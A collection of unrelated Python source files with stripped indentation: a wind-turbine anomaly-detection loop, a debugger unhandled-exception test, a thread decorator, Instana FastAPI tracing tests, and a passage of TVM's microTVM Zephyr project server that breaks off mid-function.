def __prep_turbine_sample__(self, turbine_id, data):
vib_noise,rot_noise,vol_noise = self.is_noise_enabled(turbine_id)
#np.array([8,9,10,7, 22, 5, 6]) # qX,qy,qz,qw ,wind_seed_rps, rps, voltage
if vib_noise: data[self.feature_ids[0:4]] = np.random.rand(4) * 100 # out of the radians range
if rot_noise: data[self.feature_ids[5]] = np.random.rand(1) * 100 # out of the normalized wind range
if vol_noise: data[self.feature_ids[6]] = int(np.random.rand(1)[0] * 10000) # out of the normalized voltage range
self.data_buffer[turbine_id].append(data)
if len(self.data_buffer[turbine_id]) > self.max_buffer_size:
del self.data_buffer[turbine_id][0]
def get_raw_data(self, turbine_id):
assert(turbine_id >= 0 and turbine_id < len(self.data_buffer))
self.__read_next_turbine_sample__(turbine_id)
return self.data_buffer[turbine_id]
def __read_next_turbine_sample__(self, turbine_id):
self.__prep_turbine_sample__(turbine_id, self.turbines[turbine_id].read_next_sample() )
def __detect_anomalies__(self):
"""
Keeps processing the data collected from the turbines
and do anomaly detection. It reports to each turbine the
anomalies detected (through a callback)
"""
while self.running:
# for each turbine, check the buffer
start_time = time.time()
for idx in range(self.n_turbines):
print(idx)
buffer = self.get_raw_data(idx)
if len(buffer) >= self.min_num_samples:
# create a copy & prep the data
data = self.__data_prep__(idx, np.array(buffer) )
if not self.edge_agent.is_model_loaded(self.model_meta[idx]['model_name']):
print('model is not loaded')
continue
# denoise
data = np.array([self.__wavelet_denoise__(data[:,i], 'db6', self.raw_std[i]) for i in range(self.n_features)])
data = data.transpose((1,0))
# normalize
data -= self.mean
data /= self.std
data = data[-(self.TIME_STEPS+self.STEP):]
# create the dataset and reshape it
x = self.__create_dataset__(data, self.TIME_STEPS, self.STEP)
x = np.transpose(x, (0, 2, 1)).reshape(x.shape[0], self.n_features, 10, 10)
# run the model
p = self.edge_agent.predict(self.model_meta[idx]['model_name'], x)
if p is not None:
a = x.reshape(x.shape[0], self.n_features, 100).transpose((0,2,1))
b = p.reshape(p.shape[0], self.n_features, 100).transpose((0,2,1))
# check the anomalies
pred_mae_loss = np.mean(np.abs(b - a), axis=1).transpose((1,0))
values = np.mean(pred_mae_loss, axis=1)
anomalies = (values > self.thresholds)
elapsed_time = time.time() - start_time
time.sleep(0.5-elapsed_time)
def load_model(self, model_name, model_version):
logging.info("Loading model %s version %s" % ( model_name, model_version))
model_path = os.environ.get("MODEL_PATH")
ret = self.edge_agent.load_model(model_name, model_path)
if ret is not None:
for device_id in range(self.n_turbines):
self.model_meta[device_id]['model_name'] = model_name
self.model_meta[device_id]['model_path'] = model_path
self.model_meta[device_id]['model_version'] = model_version
def start(self):
"""
Run the main application by creating the Edge Agents, loading the model and
kicking-off the anomaly detector program
"""
self.load_model("WindTurbineAnomalyDetection", "1.0")
if not self.running:
self.running = True
logging.info("Starting the anomaly detector loop...")
# finally start the anomaly detection loop
self.processing = threading.Thread(target=self.__detect_anomalies__)
self.processing.start()
def halt(self):
"""
Destroys the application and halts the agents & turbines
"""
if self.running:
self.running = False
self.processing.join()
|
_debugger_case_unhandled_exceptions_custom.py
|
import threading, atexit, sys
import time
try:
from thread import start_new_thread
except:
from _thread import start_new_thread
class MyError(Exception):
def __init__(self, msg):
return Exception.__init__(self)
def _atexit():
print('TEST SUCEEDED')
sys.stderr.write('TEST SUCEEDED\n')
sys.stderr.flush()
sys.stdout.flush()
# Register the TEST SUCEEDED msg to the exit of the process.
atexit.register(_atexit)
def thread_func():
raise MyError('in thread 1')
start_new_thread(thread_func, ())
# Wait for the first to be handled... otherwise, tests can become flaky if
# both stop at the same time only 1 notification may be given for both, whereas
# the test expects 2 notifications.
time.sleep(.5)
def thread_func2(n):
raise MyError('in thread 2')
th = threading.Thread(target=lambda: thread_func2(1))
th.setDaemon(True)
th.start()
th.join()
# This is a bit tricky: although we waited on the event, there's a slight chance
# that we didn't get the notification because the thread could've stopped executing,
# so, sleep a bit so that the test does not become flaky.
time.sleep(.5)
raise MyError('in main')
|
decorator.py
|
'''
@Summary: Contains methods to be applied as python decorators
@Author: devopsec
'''
from threading import Thread
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
|
test_fastapi.py
|
# (c) Copyright IBM Corp. 2021
# (c) Copyright Instana Inc. 2020
from __future__ import absolute_import
import time
import pytest
import requests
import multiprocessing
from instana.singletons import tracer
from ..helpers import testenv
from ..helpers import get_first_span_by_filter
@pytest.fixture(scope="module")
def server():
from tests.apps.fastapi_app import launch_fastapi
proc = multiprocessing.Process(target=launch_fastapi, args=(), daemon=True)
proc.start()
time.sleep(2)
yield
proc.kill() # Kill server after tests
def test_vanilla_get(server):
result = requests.get(testenv["fastapi_server"] + '/')
assert result.status_code == 200
assert "X-INSTANA-T" in result.headers
assert "X-INSTANA-S" in result.headers
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
spans = tracer.recorder.queued_spans()
# FastAPI instrumentation (like all instrumentation) _always_ traces unless told otherwise
assert len(spans) == 1
assert spans[0].n == 'asgi'
def test_basic_get(server):
result = None
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/')
assert result.status_code == 200
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == "asgi"
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == None)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/')
assert (asgi_span.data['http']['path_tpl'] == '/')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 200)
assert (asgi_span.data['http']['error'] is None)
assert (asgi_span.data['http']['params'] is None)
def test_400(server):
result = None
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/400')
assert result.status_code == 400
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == 'asgi'
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == None)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/400')
assert (asgi_span.data['http']['path_tpl'] == '/400')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 400)
assert (asgi_span.data['http']['error'] is None)
assert (asgi_span.data['http']['params'] is None)
def test_500(server):
result = None
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/500')
assert result.status_code == 500
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == 'asgi'
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == 1)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/500')
assert (asgi_span.data['http']['path_tpl'] == '/500')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 500)
assert (asgi_span.data['http']['error'] == '500 response')
assert (asgi_span.data['http']['params'] is None)
def test_path_templates(server):
result = None
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/users/1')
assert result.status_code == 200
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == 'asgi'
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == None)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/users/1')
assert (asgi_span.data['http']['path_tpl'] == '/users/{user_id}')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 200)
assert (asgi_span.data['http']['error'] is None)
assert (asgi_span.data['http']['params'] is None)
def test_secret_scrubbing(server):
result = None
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/?secret=shhh')
assert result.status_code == 200
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == 'asgi'
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == None)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/')
assert (asgi_span.data['http']['path_tpl'] == '/')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 200)
assert (asgi_span.data['http']['error'] is None)
assert (asgi_span.data['http']['params'] == 'secret=<redacted>')
def test_synthetic_request(server):
request_headers = {
'X-INSTANA-SYNTHETIC': '1'
}
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/', headers=request_headers)
assert result.status_code == 200
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == 'asgi'
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == None)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/')
assert (asgi_span.data['http']['path_tpl'] == '/')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 200)
assert (asgi_span.data['http']['error'] is None)
assert (asgi_span.data['http']['params'] is None)
assert (asgi_span.sy)
assert (urllib3_span.sy is None)
assert (test_span.sy is None)
def test_custom_header_capture(server):
from instana.singletons import agent
# The background FastAPI server is pre-configured with custom headers to capture
request_headers = {
'X-Capture-This': 'this',
'X-Capture-That': 'that'
}
with tracer.start_active_span('test'):
result = requests.get(testenv["fastapi_server"] + '/', headers=request_headers)
assert result.status_code == 200
spans = tracer.recorder.queued_spans()
assert len(spans) == 3
span_filter = lambda span: span.n == "sdk" and span.data['sdk']['name'] == 'test'
test_span = get_first_span_by_filter(spans, span_filter)
assert (test_span)
span_filter = lambda span: span.n == "urllib3"
urllib3_span = get_first_span_by_filter(spans, span_filter)
assert (urllib3_span)
span_filter = lambda span: span.n == 'asgi'
asgi_span = get_first_span_by_filter(spans, span_filter)
assert (asgi_span)
assert (test_span.t == urllib3_span.t == asgi_span.t)
assert (asgi_span.p == urllib3_span.s)
assert (urllib3_span.p == test_span.s)
assert "X-INSTANA-T" in result.headers
assert result.headers["X-INSTANA-T"] == asgi_span.t
assert "X-INSTANA-S" in result.headers
assert result.headers["X-INSTANA-S"] == asgi_span.s
assert "X-INSTANA-L" in result.headers
assert result.headers["X-INSTANA-L"] == '1'
assert "Server-Timing" in result.headers
assert result.headers["Server-Timing"] == ("intid;desc=%s" % asgi_span.t)
assert (asgi_span.ec == None)
assert (asgi_span.data['http']['host'] == '127.0.0.1')
assert (asgi_span.data['http']['path'] == '/')
assert (asgi_span.data['http']['path_tpl'] == '/')
assert (asgi_span.data['http']['method'] == 'GET')
assert (asgi_span.data['http']['status'] == 200)
assert (asgi_span.data['http']['error'] is None)
assert (asgi_span.data['http']['params'] is None)
assert ("X-Capture-This" in asgi_span.data["http"]["header"])
assert ("this" == asgi_span.data["http"]["header"]["X-Capture-This"])
assert ("X-Capture-That" in asgi_span.data["http"]["header"])
assert ("that" == asgi_span.data["http"]["header"]["X-Capture-That"])
|
microtvm_api_server.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import atexit
import collections
import collections.abc
import enum
import fcntl
import json
import logging
import os
import os.path
import pathlib
import queue
import re
import select
import shlex
import shutil
import subprocess
import sys
import tarfile
import tempfile
import threading
import time
import usb
import serial
import serial.tools.list_ports
import yaml
from tvm.micro.project_api import server
_LOG = logging.getLogger(__name__)
API_SERVER_DIR = pathlib.Path(os.path.dirname(__file__) or os.path.getcwd())
BUILD_DIR = API_SERVER_DIR / "build"
MODEL_LIBRARY_FORMAT_RELPATH = "model.tar"
IS_TEMPLATE = not (API_SERVER_DIR / MODEL_LIBRARY_FORMAT_RELPATH).exists()
BOARDS = API_SERVER_DIR / "boards.json"
# Used to check Zephyr version installed on the host.
# We only check two levels of the version.
ZEPHYR_VERSION = 2.7
WEST_CMD = default = sys.executable + " -m west" if sys.executable else None
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
# Data structure to hold the information microtvm_api_server.py needs
# to communicate with each of these boards.
try:
with open(BOARDS) as boards:
BOARD_PROPERTIES = json.load(boards)
except FileNotFoundError:
raise FileNotFoundError(f"Board file {{{BOARDS}}} does not exist.")
def check_call(cmd_args, *args, **kwargs):
cwd_str = "" if "cwd" not in kwargs else f" (in cwd: {kwargs['cwd']})"
_LOG.info("run%s: %s", cwd_str, " ".join(shlex.quote(a) for a in cmd_args))
return subprocess.check_call(cmd_args, *args, **kwargs)
CACHE_ENTRY_RE = re.compile(r"(?P<name>[^:]+):(?P<type>[^=]+)=(?P<value>.*)")
CMAKE_BOOL_MAP = dict(
[(k, True) for k in ("1", "ON", "YES", "TRUE", "Y")]
+ [(k, False) for k in ("0", "OFF", "NO", "FALSE", "N", "IGNORE", "NOTFOUND", "")]
)
class CMakeCache(collections.abc.Mapping):
def __init__(self, path):
self._path = path
self._dict = None
def __iter__(self):
return iter(self._dict)
def __getitem__(self, key):
if self._dict is None:
self._dict = self._read_cmake_cache()
return self._dict[key]
def __len__(self):
return len(self._dict)
def _read_cmake_cache(self):
"""Read a CMakeCache.txt-like file and return a dictionary of values."""
entries = collections.OrderedDict()
with open(self._path, encoding="utf-8") as f:
for line in f:
m = CACHE_ENTRY_RE.match(line.rstrip("\n"))
if not m:
continue
if m.group("type") == "BOOL":
value = CMAKE_BOOL_MAP[m.group("value").upper()]
else:
value = m.group("value")
entries[m.group("name")] = value
return entries
CMAKE_CACHE = CMakeCache(BUILD_DIR / "CMakeCache.txt")
class BoardError(Exception):
"""Raised when an attached board cannot be opened (i.e. missing /dev nodes, etc)."""
class BoardAutodetectFailed(Exception):
"""Raised when no attached hardware is found matching the board= given to ZephyrCompiler."""
def _get_flash_runner():
flash_runner = CMAKE_CACHE.get("ZEPHYR_BOARD_FLASH_RUNNER")
if flash_runner is not None:
return flash_runner
with open(CMAKE_CACHE["ZEPHYR_RUNNERS_YAML"]) as f:
doc = yaml.load(f, Loader=yaml.FullLoader)
return doc["flash-runner"]
def _get_device_args(options):
flash_runner = _get_flash_runner()
if flash_runner == "nrfjprog":
return _get_nrf_device_args(options)
if flash_runner == "openocd":
return _get_openocd_device_args(options)
raise BoardError(
f"Don't know how to find serial terminal for board {CMAKE_CACHE['BOARD']} with flash "
f"runner {flash_runner}"
)
def generic_find_serial_port(serial_number=None):
"""Find a USB serial port based on its serial number or its VID:PID.
This method finds a USB serial port device path based on the port's serial number (if given) or
based on the board's idVendor and idProduct ids.
Parameters
----------
serial_number : str
The serial number associated to the USB serial port which the board is attached to. This is
the same number as shown by 'lsusb -v' in the iSerial field.
Returns
-------
Path to the USB serial port device, for example /dev/ttyACM1.
"""
if serial_number:
regex = serial_number
else:
prop = BOARD_PROPERTIES[CMAKE_CACHE["BOARD"]]
device_id = ":".join([prop["vid_hex"], prop["pid_hex"]])
regex = device_id
serial_ports = list(serial.tools.list_ports.grep(regex))
if len(serial_ports) == 0:
raise Exception(f"No serial port found for board {prop['board']}!")
if len(serial_ports) != 1:
ports_lst = ""
for port in serial_ports:
ports_lst += f"Serial port: {port.device}, serial number: {port.serial_number}\n"
raise Exception("Expected 1 serial port, found multiple ports:\n {ports_lst}")
return serial_ports[0].device
def _get_openocd_device_args(options):
serial_number = options.get("openocd_serial")
return ["--serial", generic_find_serial_port(serial_number)]
def _get_nrf_device_args(options):
nrfjprog_args = ["nrfjprog", "--ids"]
nrfjprog_ids = subprocess.check_output(nrfjprog_args, encoding="utf-8")
if not nrfjprog_ids.strip("\n"):
raise BoardAutodetectFailed(f'No attached boards recognized by {" ".join(nrfjprog_args)}')
boards = nrfjprog_ids.split("\n")[:-1]
if len(boards) > 1:
if options["nrfjprog_snr"] is None:
raise BoardError(
"Multiple boards connected; specify one with nrfjprog_snr=: " f'{", ".join(boards)}'
)
if str(options["nrfjprog_snr"]) not in boards:
raise BoardError(
f"nrfjprog_snr ({options['nrfjprog_snr']}) not found in {nrfjprog_args}: {boards}"
)
return ["--snr", options["nrfjprog_snr"]]
if not boards:
return []
return ["--snr", boards[0]]
PROJECT_TYPES = []
if IS_TEMPLATE:
for d in (API_SERVER_DIR / "src").iterdir():
if d.is_dir():
PROJECT_TYPES.append(d.name)
PROJECT_OPTIONS = [
server.ProjectOption(
"extra_files_tar",
optional=["generate_project"],
type="str",
help="If given, during generate_project, uncompress the tarball at this path into the project dir.",
),
server.ProjectOption(
"gdbserver_port",
help=("If given, port number to use when running the local gdbserver."),
optional=["open_transport"],
type="int",
),
server.ProjectOption(
"nrfjprog_snr",
optional=["open_transport"],
type="int",
help=("When used with nRF targets, serial # of the attached board to use, from nrfjprog."),
),
server.ProjectOption(
"openocd_serial",
optional=["open_transport"],
type="int",
help=("When used with OpenOCD targets, serial # of the attached board to use."),
),
server.ProjectOption(
"project_type",
choices=tuple(PROJECT_TYPES),
required=["generate_project"],
type="str",
help="Type of project to generate.",
),
server.ProjectOption(
"verbose",
optional=["build"],
type="bool",
help="Run build with verbose output.",
),
server.ProjectOption(
"west_cmd",
optional=["build"],
default=WEST_CMD,
type="str",
help=(
"Path to the west tool. If given, supersedes both the zephyr_base "
"option and ZEPHYR_BASE environment variable."
),
),
server.ProjectOption(
"zephyr_base",
required=(["generate_project", "open_transport"] if not ZEPHYR_BASE else None),
optional=(["generate_project", "open_transport", "build"] if ZEPHYR_BASE else ["build"]),
default=ZEPHYR_BASE,
type="str",
help="Path to the zephyr base directory.",
),
server.ProjectOption(
"zephyr_board",
required=["generate_project", "build", "flash", "open_transport"],
choices=list(BOARD_PROPERTIES),
type="str",
help="Name of the Zephyr board to build for.",
),
server.ProjectOption(
"config_main_stack_size",
optional=["generate_project"],
type="int",
help="Sets CONFIG_MAIN_STACK_SIZE for Zephyr board.",
),
server.ProjectOption(
"warning_as_error",
optional=["generate_project"],
type="bool",
help="Treat warnings as errors and raise an Exception.",
),
server.ProjectOption(
"compile_definitions",
optional=["generate_project"],
type="str",
help="Extra definitions added project compile.",
),
]
def get_zephyr_base(options: dict):
"""Returns Zephyr base path"""
zephyr_base = options.get("zephyr_base", ZEPHYR_BASE)
assert zephyr_base, "'zephyr_base' option not passed and not found by default!"
return zephyr_base
class Handler(server.ProjectAPIHandler):
def __init__(self):
super(Handler, self).__init__()
self._proc = None
def server_info_query(self, tvm_version):
return server.ServerInfo(
platform_name="zephyr",
is_template=IS_TEMPLATE,
model_library_format_path=""
if IS_TEMPLATE
else (API_SERVER_DIR / MODEL_LIBRARY_FORMAT_RELPATH),
project_options=PROJECT_OPTIONS,
)
# These files and directories will be recursively copied into generated projects from the CRT.
CRT_COPY_ITEMS = ("include", "Makefile", "src")
# Maps extra line added to prj.conf to a tuple or list of zephyr_board for which it is needed.
EXTRA_PRJ_CONF_DIRECTIVES = {
"CONFIG_TIMER_RANDOM_GENERATOR=y": (
"qemu_x86",
"qemu_riscv32",
"qemu_cortex_r5",
"qemu_riscv64",
),
"CONFIG_ENTROPY_GENERATOR=y": (
"mps2_an521",
"nrf5340dk_nrf5340_cpuapp",
"nucleo_f746zg",
"nucleo_l4r5zi",
"stm32f746g_disco",
),
}
def _create_prj_conf(self, project_dir, options):
with open(project_dir / "prj.conf", "w") as f:
f.write(
"# For UART used from main().\n"
"CONFIG_RING_BUFFER=y\n"
"CONFIG_UART_CONSOLE=n\n"
"CONFIG_UART_INTERRUPT_DRIVEN=y\n"
"\n"
)
f.write("# For TVMPlatformAbort().\n" "CONFIG_REBOOT=y\n" "\n")
if options["project_type"] == "host_driven":
f.write(
"# For RPC server C++ bindings.\n"
"CONFIG_CPLUSPLUS=y\n"
"CONFIG_LIB_CPLUSPLUS=y\n"
"\n"
)
f.write("# For math routines\n" "CONFIG_NEWLIB_LIBC=y\n" "\n")
if self._has_fpu(options["zephyr_board"]):
f.write("# For models with floating point.\n" "CONFIG_FPU=y\n" "\n")
# Set main stack size, if needed.
if options.get("config_main_stack_size") is not None:
f.write(f"CONFIG_MAIN_STACK_SIZE={options['config_main_stack_size']}\n")
f.write("# For random number generation.\n" "CONFIG_TEST_RANDOM_GENERATOR=y\n")
f.write("\n# Extra prj.conf directives\n")
for line, board_list in self.EXTRA_PRJ_CONF_DIRECTIVES.items():
if options["zephyr_board"] in board_list:
f.write(f"{line}\n")
f.write("\n")
API_SERVER_CRT_LIBS_TOKEN = "<API_SERVER_CRT_LIBS>"
CRT_LIBS_BY_PROJECT_TYPE = {
"host_driven": "microtvm_rpc_server microtvm_rpc_common common",
"aot_demo": "memory microtvm_rpc_common common",
}
def _get_platform_version(self, zephyr_base: str) -> float:
with open(pathlib.Path(zephyr_base) / "VERSION", "r") as f:
lines = f.readlines()
for line in lines:
line = line.replace(" ", "").replace("\n", "").replace("\r", "")
if "VERSION_MAJOR" in line:
version_major = line.split("=")[1]
if "VERSION_MINOR" in line:
version_minor = line.split("=")[1]
return float(f"{version_major}.{version_minor}")
def generate_project(self, model_library_format_path, standalone_crt_dir, project_dir, options):
# Check Zephyr version
version = self._get_platform_version(get_zephyr_base(options))
if version != ZEPHYR_VERSION:
message = f"Zephyr version found is not supported: found {version}, expected {ZEPHYR_VERSION}."
if options.get("warning_as_error") is not None and options["warning_as_error"]:
raise server.ServerError(message=message)
_LOG.warning(message)
project_dir = pathlib.Path(project_dir)
# Make project directory.
project_dir.mkdir()
# Copy ourselves to the generated project. TVM may perform further build steps on the generated project
# by launching the copy.
shutil.copy2(__file__, project_dir / os.path.basename(__file__))
# Copy boards.json file to generated project.
shutil.copy2(BOARDS, project_dir / BOARDS.name)
# Place Model Library Format tarball in the special location, which this script uses to decide
# whether it's being invoked in a template or generated project.
project_model_library_format_tar_path = project_dir / MODEL_LIBRARY_FORMAT_RELPATH
shutil.copy2(model_library_format_path, project_model_library_format_tar_path)
# Extract Model Library Format tarball.into <project_dir>/model.
extract_path = os.path.splitext(project_model_library_format_tar_path)[0]
with tarfile.TarFile(project_model_library_format_tar_path) as tf:
os.makedirs(extract_path)
tf.extractall(path=extract_path)
if self._is_qemu(options):
shutil.copytree(API_SERVER_DIR / "qemu-hack", project_dir / "qemu-hack")
# Populate CRT.
crt_path = project_dir / "crt"
crt_path.mkdir()
for item in self.CRT_COPY_ITEMS:
src_path = os.path.join(standalone_crt_dir, item)
dst_path = crt_path / item
if os.path.isdir(src_path):
shutil.copytree(src_path, dst_path)
else:
shutil.copy2(src_path, dst_path)
# Populate Makefile.
with open(API_SERVER_DIR / "CMakeLists.txt.template", "r") as cmake_template_f:
with open(project_dir / "CMakeLists.txt", "w") as cmake_f:
for line in cmake_template_f:
if self.API_SERVER_CRT_LIBS_TOKEN in line:
crt_libs = self.CRT_LIBS_BY_PROJECT_TYPE[options["project_type"]]
line = line.replace("<API_SERVER_CRT_LIBS>", crt_libs)
cmake_f.write(line)
if options.get("compile_definitions"):
flags = options.get("compile_definitions")
for item in flags:
cmake_f.write(f"target_compile_definitions(app PUBLIC {item})\n")
self._create_prj_conf(project_dir, options)
# Populate crt-config.h
crt_config_dir = project_dir / "crt_config"
crt_config_dir.mkdir()
shutil.copy2(
API_SERVER_DIR / "crt_config" / "crt_config.h", crt_config_dir / "crt_config.h"
)
# Populate src/
src_dir = project_dir / "src"
shutil.copytree(API_SERVER_DIR / "src" / options["project_type"], src_dir)
# Populate extra_files
if options.get("extra_files_tar"):
with tarfile.open(options["extra_files_tar"], mode="r:*") as tf:
tf.extractall(project_dir)
def build(self, options):
BUILD_DIR.mkdir()
cmake_args = ["cmake", ".."]
if options.get("verbose"):
cmake_args.append("-DCMAKE_VERBOSE_MAKEFILE:BOOL=TRUE")
if options.get("zephyr_base"):
cmake_args.append(f"-DZEPHYR_BASE:STRING={options['zephyr_base']}")
if options.get("west_cmd"):
cmake_args.append(f"-DWEST={options['west_cmd']}")
cmake_args.append(f"-DBOARD:STRING={options['zephyr_board']}")
check_call(cmake_args, cwd=BUILD_DIR)
args = ["make", "-j2"]
if options.get("verbose"):
args.append("VERBOSE=1")
check_call(args, cwd=BUILD_DIR)
# A list of all zephyr_board values which are known to launch using QEMU. Many platforms which
# launch through QEMU by default include "qemu" in their name. However, not all do. This list
# includes those tested platforms which do not include qemu.
_KNOWN_QEMU_ZEPHYR_BOARDS = ("mps2_an521",)
@classmethod
def _is_qemu(cls, options):
return (
"qemu" in options["zephyr_board"]
or options["zephyr_board"] in cls._KNOWN_QEMU_ZEPHYR_BOARDS
)
@classmethod
def _has_fpu(cls, zephyr_board):
fpu_boards = [name for name, board in BOARD_PROPERTIES.items() if board["fpu"]]
return zephyr_board in fpu_boards
def flash(self, options):
if self._is_qemu(options):
return # NOTE: qemu requires no flash step--it is launched from open_transport.
zephyr_board = options["zephyr_board"]
